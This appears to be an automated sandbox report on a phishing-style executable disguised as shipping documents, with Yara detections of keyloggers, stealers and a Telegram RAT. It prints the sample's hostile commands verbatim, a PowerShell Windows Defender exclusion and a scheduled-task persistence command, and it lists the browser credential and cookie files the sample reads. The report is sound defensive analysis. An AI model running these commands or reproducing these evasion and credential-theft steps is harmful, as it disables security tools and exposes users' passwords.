Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 594500	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4539611583.0000000007474000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Code function: 0_2_044607C8 LdrInitializeThunk,

0_2_044607C8

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe"
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe"			Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SNgtfGzYQ" /XML "C:\Users\user\AppData\Local\Temp\tmpE1BD.tmp"			Jump to behavior

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Queries volume information: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Queries volume information: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 8.2.SNgtfGzYQ.exe.7850000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.SNgtfGzYQ.exe.7850000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.SNgtfGzYQ.exe.43988d8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.SNgtfGzYQ.exe.43b88f8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.SNgtfGzYQ.exe.43988d8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.SNgtfGzYQ.exe.43b88f8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2125384122.0000000007850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2122802743.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2122802743.00000000043B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match

File source: 00000000.00000002.4530259452.0000000002451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe PID: 6300, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe PID: 6300, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe PID: 6300, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 8.2.SNgtfGzYQ.exe.7850000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.SNgtfGzYQ.exe.7850000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.SNgtfGzYQ.exe.43988d8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.SNgtfGzYQ.exe.43b88f8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.SNgtfGzYQ.exe.43988d8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.SNgtfGzYQ.exe.43b88f8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2125384122.0000000007850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2122802743.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2122802743.00000000043B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match

File source: 00000000.00000002.4530259452.0000000002451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe PID: 6300, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe PID: 6300, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	3 Obfuscated Files or Information	LSASS Memory	12 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	2 Software Packing	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	11 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Process Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Virtualization/Sandbox Evasion	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
